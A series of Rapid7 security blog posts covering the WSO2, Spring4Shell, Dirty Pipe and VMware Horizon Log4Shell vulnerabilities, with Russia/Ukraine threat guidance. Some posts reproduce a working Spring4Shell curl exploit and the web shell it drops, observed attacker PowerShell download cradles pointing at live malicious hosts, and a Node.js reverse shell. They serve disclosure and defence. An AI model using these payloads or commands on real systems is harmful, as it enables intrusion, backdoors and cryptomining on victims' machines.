Rapid7’s Managed Detection and Response (MDR) team has observed this vulnerability being opportunistically exploited in the wild. Attackers appear to be staying close to the original proof-of-concept exploit and are dropping web shells and coin miners on exploited targets. Victim systems include both Windows and Linux installations of the aforementioned WSO2 products.

Rapid7 recommends remediating this vulnerability immediately per the instructions in WSO2’s advisory. If remediation is not possible, remove installations from the public internet as soon as possible. Inspect your installation for web shells (.jsp and .class): For example, the original proof of concept will drop the webshell in /authenticationendpoint/ which, when using API Manager on Windows, can be found in C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps\authenticationendpoint. Additionally, examine the server’s http_access log for requests to /fileupload/toolsAny as a possible indication of malicious behavior:

10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1 
200 31 - curl/7.74.0 0.016
10.0.0.2 - - [22/Apr/2022:15:48:46 -0400] POST //fileupload/toolsAny HTTP/1.1 200 31 - python-requests/2.25.1 0.000
10.0.0.2 - - [22/Apr/2022:15:49:13 -0400] POST /fileupload/toolsAny HTTP/1.1 200 32 - python-requests/2.25.1 0.000

Additionally, dropped war files will likely be exploded in the webapps directory (e.g. C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps). The deployment may create entries such as the following in the wso2carbon log:

TID: [-1234] [r7] [2022-04-22 15:51:32,609]  INFO {org.wso2.carbon.webapp.
mgt.TomcatGenericWebappsDeployer} - Deployed webapp: StandardEngine
[Catalina].StandardHost[localhost].StandardContext[/r7].File[C:\PROGRA~1\
WSO2\APIMAN~1\32E445~1.0\bin\..\repository\deployment\server\webapps\r7.war]

Rapid7 customers

Rapid7 InsightIDR customers already have detection rules in place that can identify activity around the exploitation of this vulnerability. Customers should consider reviewing the rule action and priority of the following detection rules. Teams should be ready to investigate any alerts generated from these rules. For Rapid7 MDR customers, the MDR team is monitoring these alerts and will notify you if suspicious activity is detected in your environment.

  • Suspicious Process – Python Downloading and Executing Script
  • Attacker Technique – URL Passed To BitsAdmin
  • Attacker Technique – CertUtil With URLCache Flag
  • Attacker Technique – PowerShell Download Cradles

The Rapid7 Threat Detection and Response team also added the following rule to identify malicious activity specifically related to this exploit:

  • Suspicious Process – WSO2 Product Launches Suspicious Process (added 2022-04-22 19:19 UTC)

We are actively working on development of a vulnerability check for InsightVM and Nexpose customers and will update this blog with further information as it is available.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Update on Spring4Shell’s Impact on Rapid7 Solutions and Systems

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/

Update on Spring4Shell’s Impact on Rapid7 Solutions and Systems

We have been continuously monitoring for Spring4Shell exploit attempts in our environment and have been urgently investigating the implications for our corporate and production systems. We are actively remediating vulnerabilities as we find them and monitoring for any anomalous activity in our environment.

We will update this page as we learn more. At this time, customers do not need to take any action.

Further reading and recommendations

Our Emergent Threat Response team has put together a detailed blog post with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Spring4Shell: Zero-Day Vulnerability in Spring Framework

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/

Spring4Shell: Zero-Day Vulnerability in Spring Framework

If you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from Log4Shell. While discovery and research is evolving, we’re posting the facts we’ve gathered and updating guidance as new information becomes available.

What Rapid7 customers can expect

Our team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.

Our team will be updating this blog continually. Our next update will be at 9 PM EDT on March 30, 2022.

Introduction

On March 30, 2022, rumors began to circulate about an unpatched remote code execution (RCE) vulnerability in Spring Framework when a Chinese-speaking researcher published a GitHub commit that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by Spring.io (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly deleted.

Spring4Shell: Zero-Day Vulnerability in Spring Framework

A lot of confusion followed for several reasons:

  • The researcher’s original technical writeup needed to be translated.
  • The vulnerability (and proof of concept) isn’t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below.
  • A completely different unauthenticated RCE vulnerability was published yesterday (March 29, 2022) for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.

Rapid7’s research team has confirmed the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it’s currently unclear which real-world applications use the vulnerable functionality. This code ends up resulting in widespread exploitation or no exploitation at all, depending on how the features are used.

Recreating exploitation

The vulnerability appears to affect functions that use the @RequestMapping annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a Springframework MVC demonstration:

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

/**
 * @author Ramesh Fadatare
 */
@Controller
public class HelloWorldController {

	@RequestMapping("/rapid7")
	public void vulnerable(HelloWorld model) {
	}
}

Here we have a controller (HelloWorldController) that, when loaded into Tomcat, will handle HTTP requests to http://name/appname/rapid7. The function that handles the request is called vulnerable and has a POJO parameter HelloWorld. Here, HelloWorld is stripped down but POJO can be quite complicated if need be:

package net.javaguides.springmvc.helloworld.model;

public class HelloWorld {
	private String message;
}

And that’s it. That’s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)

If we compile the project and host it on Tomcat, we can then exploit it with the following curl command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):

curl -v -d "class.module.classLoader.resources.context.parent.pipeline
.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%
22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt
ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%
20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20
while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7
D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context
.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources
.context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl
assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl
ass.module.classLoader.resources.context.parent.pipeline.first.fileDat
eFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-
SNAPSHOT/rapid7

This payload drops a password protected webshell in the Tomcat ROOT directory called tomcatwar.jsp, and it looks like this:

- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in
= -.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.
println(new String(b)); } } -

Attackers can then invoke commands. Here is an example of executing whoami to get albinolobster:

Spring4Shell: Zero-Day Vulnerability in Spring Framework

The Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.

About the payload

The payload we’ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014 and alters the Tomcat server’s logging properties via ClassLoader. The payload simply redirects the logging logic to the ROOT directory and drops the file + payload. A good technical writeup can be found here.

This is just one possible payload and will not be the only one. We’re certain that malicious class-loading payloads will appear quickly.

Mitigation guidance

This zero-day vulnerability is unpatched and has no CVE assigned as of March 30, 2022. The Spring documentation for DataBinder explicitly notes:

… [T]here are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.

Therefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.

If your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.

Until a patch is available, and if an organization is unable to use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, “post-exploitation” attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.

Vulnerability disambiguation

There has been significant confusion about the zero-day vulnerability we discuss in this blog post because an unrelated vulnerability in another Spring project was published yesterday (March 29, 2022). That vulnerability, CVE-2022-22963, affects Spring Cloud Function, which is not in Spring Framework. Spring released versions 3.1.7 and 3.2.3 to address CVE-2022-22963. CVE-2022-22963 is completely unrelated to the zero-day RCE under investigation in this blog post.

Further, yet another vulnerability CVE-2022-22950 was assigned on March 28th. A fix was released on the same day. To keep things confusing, this medium-severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 to 5.3.16. This CVE is completely unrelated to the zero-day RCE under investigation in this blog post.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/

CVE Disclosure AttackerKB IVM Content Patching Urgency Blog’s Last Update
CVE-2022-0847 Original disclosure AttackerKB March 9, 2022 When practical March 9, 2022 5:30 PM EST

CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel

On March 7, 2022, CM4all security researcher Max Kellermann published technical details on CVE-2022-0847, an arbitrary file overwrite vulnerability in versions 5.8+ of the Linux kernel. Nicknamed “Dirty Pipe,” the vulnerability arises from incorrect Unix pipe handling, where unprivileged processes can corrupt read-only files. Successful exploitation allows local attackers to escalate privileges by modifying or overwriting typically inaccessible files — potentially including root passwords and SUID binaries.

CVE-2022-0847 affects Linux kernel versions since 5.8. Read Rapid7’s full technical analysis of the vulnerability in AttackerKB, including PoC and patch analysis.

While CVSS is not yet available, CVE-2022-0847 will likely carry a “High” severity rating rather than a “Critical” one given the authentication requirement. Multiple public exploits are available, including a proof of concept from the original disclosure and a Metasploit module. We are not aware of any reports of exploitation in the wild as of March 9, 2022.

This is a “patch, but no need to panic” situation. With that said, a few factors make this bug stand out a bit more than the average local privilege escalation (LPE) vuln. First and foremost, this is a simple attack to execute once initial access has been obtained, and it offers adversaries broad avenues for privileged operations after sensitive files (like root passwords) have been modified. Security researchers have also demonstrated that in some cases, public exploit code can be used to escape containers in that files modified inside the container also get modified on the host. Finally, the lingering specter of Log4Shell means that there may be a higher chance that attackers already have local access required to execute a privilege escalation attack on Linux systems.

Updates to Linux distributions have been trickling out. Organizations should apply the latest patches as soon as they are available and reboot systems.

Rapid7 customers

Upcoming content releases for InsightVM and Nexpose customers will provide checks for CVE-2022-0847 as supported Linux vendors publish distribution-specific security advisories and updated packages. Checks for Debian and Ubuntu are expected March 9, with SUSE to follow later in the week. Red Hat has not yet published any errata at this time.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/

Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?

Rapid7 is monitoring the escalating conflict in Ukraine, and we have provided a blog on the various attack vectors organizations may see, as well as guidance on mitigations and remediations.

To assist with your preparation and response efforts, Rapid7 is continuously integrating into our products the most up-to-date threat intelligence — both consumed and curated — which are monitoring for new attack vectors and intelligence in order to alert on attacker behaviors that are associated with various Advanced Persistent Threat (APT) groups within InsightIDR.

If you are a Managed Detection & Response (MDR) customer, our global SOC teams are monitoring your environment 24/7 with a high degree of diligence, and as standard procedure, any verified suspicious activity will be investigated and reported to you with expediency. Considering the current crisis, we have placed a special emphasis on the most relevant APT groups, and we are closely monitoring a wide breadth of sources to make use of any newly created and verified indicators.

Keeping software patched against known vulnerabilities is an important first line of defense against attackers. On January 11, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) published Alert AA22-011A: Understanding and Mitigating Russian State-Sponsored Cyber Threats to US Critical Infrastructure, listing several vulnerabilities known to be exploited by Russian threat actors.

InsightVM and Nexpose have checks for the CVEs called out in this alert. These vulnerabilities are included in InsightVM’s Threat Feed Dashboard (see the Assets With Actively Targeted Vulnerabilities card and the Most Common Actively Targeted Vulnerabilities card), along with other vulnerabilities known to be exploited in the wild.

Useful resources

Staying Secure in a Global Cyber Conflict

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/

Staying Secure in a Global Cyber Conflict

Now that Russia has begun its armed invasion of Ukraine, we should expect increasing risks of cybersecurity attacks and incidents, either as spillover from cyberattacks targeting Ukraine or direct attacks against actors supporting Ukraine.

Any state-sponsored Russian attacks aiming to support the Russian invasion of Ukraine, or to retaliate for US, NATO, or other foreign measures taken in response to the Russian invasion of Ukraine, are most likely to be destructive or disruptive in nature rather than aiming to steal data. This blog discusses the types of attacks organizations may see — including distributed denial of service (DDoS), website defacements, and the use of ransomware or destructive malware — and recommends steps for their mitigation or remediation.

As we have stated before, we do not believe organizations need to panic. But as per guidance from numerous governments, we do believe it is wise to be extra vigilant at this time. Rapid7 will continue to monitor the cybersecurity risks, both internally and for our Managed Detection and Response (MDR) customers as the situation evolves. We will post updates as relevant and suggest subscription to our blog to see them as they are posted.

Malware

One of the most concerning possibilities is the risk of a destructive malware attack on the US, NATO members, or other foreign countries. This could take the form of a direct attack or spillover from an attack on Ukraine, such as the 2017 NotPetya operation that targeted Ukraine and spread to other parts of the globe. Cybersecurity researchers have just discovered a new data wiping malware, dubbed HermeticWiper (AKA KillDisk.NCV), that infected hundreds of Ukrainian machines in the last two months. This seems to be a custom-written malware that corrupts the Master Boot Record (MBR), resulting in boot failure. This malware, like NotPetya, is intended to be destructive and will cripple the assets that it infects.

As always, the best malware prevention is to avoid infection in the first place — a risk we can minimize by ensuring that assets are up to date and use strong access controls, including multi-factor authentication. Additionally, it is crucial to have an incident response plan in place for the worst-case scenario, as well as a business continuity plan — including failover infrastructure if possible — for business-critical assets.

DDoS

There have already been reports of DDoS attacks on Ukrainian websites, and Russia has historically used DDoS in support of operations against other former Soviet republics, such as Georgia, in the past. Given this context, it is plausible that state-sponsored Russian actors would use DDoS if they choose to retaliate in response to measures taken against Russia for the invasion of Ukraine, such as sanctions or cyber operations from NATO countries.

While DDoS does not receive the same level of attention as some other forms of attack, it can still have significant impacts to business operations. DDoS mitigations can include reduction of attack surface area via Content Distribution Networks or load balancers, as well as the use of Access Control Lists and firewalls to drop traffic coming from attacker nodes.

Phishing campaigns

Russian state-sponsored actors are also well known for engaging in spear-phishing attacks, specifically with compromised valid accounts. Defenders should ensure strong spam filtering and attachment scanning is in place. Educating end users of the dangers of phishing and regularly running phishing campaigns will also help mitigate this issue.

State-sponsored, APT-style groups are not the only relevant threats. In times of crisis, it is common to see phishing attacks linking to malicious websites masquerading as news, aid groups, or other seemingly relevant content. Opportunistic scammers and other bad actors will attempt to take advantage of our human nature when curiosity, anxiety, and desire to help can make people less suspicious. Remain vigilant and avoid clicking unknown links or opening attachments — basic cyber hygiene that can be forgotten when emotions run high.

Brute-force attacks

According to a report from the NSA, CISA, FBI, and NCSC, “From mid-2019 through early 2021, Russian General Staff Main Intelligence Directorate (GRU) … conduct[ed] widespread, distributed, and anonymized brute-force access attempts against hundreds of government and private sector targets worldwide.” GRU used the discovered credentials to gain access into networks and further used known vulnerabilities such as CVE-2020-0688 and CVE-2020-17144 to increase access.

The best mitigation for these types of attacks is to enable MFA on all systems. Minimize externally facing systems and ensure externally facing systems are fully patched.

Defacement

Ukraine has also been experiencing website defacements, which provide attackers with an opportunity to spread messaging. Website defacement is typically associated with hacktivist activity, but state-sponsored Russian actors could pose as hacktivists in order to disguise Russian state involvement, and spread their strategic communication themes to international audiences by defacing Western websites.

Website defacement often occurs as a result of weak passwords for admin accounts, cross-site scripting, injection, file upload, or vulnerable plugins. This can be managed by limiting the level of access accounts have and enforcing strong passwords. Additionally, looking for places where scripts or iframes could be injected or where SQL injection could occur can help identify vulnerabilities to remediate.

Ransomware

Ransomware could also be used to disrupt foreign targets. Criminals based in Russia were believed to be behind the 2021 ransomware attack on Colonial Pipeline in the United States. Ransomware can have disruptive effects on targets, and the attackers could simply refrain from decrypting files, even if they receive ransom payments, in order to maximize and extend the disruptive impact on victims. Additionally, opportunistic attackers who are actually looking for ransoms will still be on the prowl, and are likely to take advantage of the chaos.

To this end, defenders should:

  • Evaluate asset and application configurations to ensure resilience
  • Double-check visibility into the functioning of business-critical assets
  • Assess incident response processes in the case of an incident

What else should you be doing?

The following activities are mission-critical in times of uncertainty, but they are also best practices in general.

  • Continuous monitoring: Reinforce cybersecurity measures and staff during nights, weekends, and holidays. Threat actors are known to target their victims when there are gaps in “eyes on glass.”
  • Incident response plan: Prepare a dedicated team with a detailed workflow and a contact person that will be available offline in case of a cybersecurity incident.
  • Back up data: Implement data backup procedures of the company networks and systems. Backup procedures should be conducted on a frequent, regular basis for immediate recovery. Also, be sure to store backups offline and check them regularly to ensure they have not been poisoned with malware.
  • Reduce opportunities for attackers: Identify exposures, vulnerabilities, and misconfigurations that can provide opportunities for attackers to gain a foothold in your environment, and apply relevant mitigations or patches. In particular, Russian operators are well known to exploit edge systems. The Cybersecurity and Infrastructure Security Agency (CISA) recently put out an alert listing 13 known vulnerabilities that Russian state-sponsored threat actors use to initially compromise networks. We recommend this as a starting point for focused patching and mitigation.
  • Stay informed: Follow the latest updates and recommendations provided by Rapid7, as well as governmental security entities in specific press releases/alerts from the Ukraine CERT, The Security Service of Ukraine (SSU), and the US CISA.

We expect the situation to be fluid over the coming days and weeks, and security guidance and threats may also evolve as the conflict develops. The measures suggested in this blog will continue to be relevant, and we plan to provide additional information as needed.

In the meantime, you can also check this blog to see how Rapid7 can help you prepare for and respond to cyber attacks. We also recommend organizations check their government’s cybersecurity website for guidance.

Active Exploitation of VMware Horizon Servers

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/01/18/active-exploitation-of-vmware-horizon-servers/

Active Exploitation of VMware Horizon Servers

This post is co-authored by Charlie Stafford, Lead Security Researcher.

Summary

Attackers are actively targeting VMware Horizon servers vulnerable to Apache Log4j CVE-2021-44228 (Log4Shell) and related vulnerabilities that were patched in December 2021. We’re sharing our observed activities and indicators of compromise (IOCs) related to this activity.

Details

Beginning Friday, January 14, 2022, Rapid7 Managed Detection & Response (MDR) began monitoring a sudden increase in VMware Horizon exploitation. The activity our teams are observing is similar to observed threat activity detailed by NHS Digital. Rapid7 services and research teams expect to see a continued strong upward trend in attacker activity directed at VMware Horizon instances vulnerable to Log4Shell exploits.

Rapid7 customers

Rapid7 InsightIDR and MDR customers: Alerts generated by the following detection rules can assist in identifying successful VMware Horizon exploitation:

  • Attacker Technique – PowerShell Download Cradles (created: Thursday, January 3, 2019, 15:31:27 UTC)
  • Suspicious Process – VMWare Horizon Spawns CMD or PowerShell (created: Thursday, January 6, 2022, 14:18:21 UTC)

Rapid7 researchers are currently evaluating the feasibility of adding a VMware Horizon vulnerability check for Nexpose/InsightVM.

We have a dedicated resource page for the Log4j vulnerability, which includes our AttackerKB analysis of Log4Shell containing a proof-of-concept exploit for VMware Horizon.

Recommendations

Patch Immediately: Organizations that still have a vulnerable version of VMware Horizon in their environment should update to a patched version of Horizon on an emergency basis and review the system(s) for signs of compromise. As a general practice, Rapid7 recommends never exposing VMware Horizon to the public internet, only allowing access behind a VPN.

Organizations are advised to proactively block traffic to the IPs/URLs listed in the IOCs section.

Observed activities

Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team has identified five unique avenues that attackers have taken post-exploitation, indicating that multiple actors are involved in this mass exploitation activity.

The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system.

TIDE has observed the attacker downloading cryptocurrency miners from the following URLs:

  • http://72.46.52[.]135/mad_micky.bat
  • http://80.71.158[.]96/xms.ps1
  • http://101.79.1[.]118/2.ps1

The following is an example PowerShell command from this activity (note that these contents were originally base64 encoded):

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://72.46.52[.]135/mad_micky.bat', $tempfile); & $tempfile

The System.Net.WebClient download cradle has also been used by one unknown actor to deploy a reverse shell based on Invoke-WebRev (https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Invoke-WebRev.ps1) from http://87.121.52[.]221:443/dd.ps1. Another actor has used it to download a Cobalt Strike backdoor from http://185.112.83[.]116:8080/drv. This backdoor was created using the trial version of Cobalt Strike, meaning it contains the EICAR anti-virus test string which should be identified by any AV vendor.

One actor attempts to use System.Net.WebClient to download a rudimentary backdoor from http://0.tcp.ngrok[.]io:18765/qs.exe. If this method fails, the PowerShell BitsTransfer object is used as a backup download method. In this instance, the actor is using ngrok[.]io URLs. NGrok is a tool that allows a user to tunnel traffic through a NAT or firewall. The backdoor communicates with http://2.tcp.ngrok[.]io:19969/index.php and will execute PowerShell commands received from that host.

Example command from this activity:

$a="http://0.tcp.ngrok[.]io:18765/qs.exe";$b="c:\windows\temp\qs.exe";$c = "c:\users\public\qs.exe";Import-Module BitsTransfer;try{(New-Object System.Net.WebClient).DownloadFile($a, $b);Start-Process -FilePath $b;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $b;Start-Process -FilePath $b;exit;}catch{};try{(New-Object System.Net.WebClient).DownloadFile($a, $c);Start-Process -FilePath $c;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $c;Start-Process -FilePath $c;exit;}catch{}

The final method TIDE has observed at Rapid7 customers involves the attacker using the copy of Node included with the VMWare server at C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe. Node is used to execute a small snippet of JavaScript code that establishes a reverse shell to 146.59.130.58:

C:\"Program Files"\VMware\"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(4460, '146.59.130.58', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"

Indicators of compromise (IOC)

The full list of IOCs that TIDE has observed related to this activity is as follows:

  • 72.46.52[.]135

    • mad_micky.bat
    • 58e22726592ec5ab6ca49eda2fdb7017

  • 80.71.158[.]96

    • xms.ps1
    • e397087edf21ad9da907b595691ce15e

  • 101.79.1[.]118

    • 2.ps1
    • 6422ede9aadd1a768cb57fe06c1155ad

  • 87.121.52[.]221

    • dd.ps1
    • f7d5a47321e436fe33e03c4dbf29bd92

  • 185.112.83[.]116

    • drv
    • 00a4e6f11d2dae5146995aa489292677

  • 0.tcp.ngrok[.]io:18765

  • 2.tcp.ngrok[.]io:19969

    • qs.exe
    • 1fcf790cc9c66794ae93c114c61b412e

  • 146.59.130.58

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.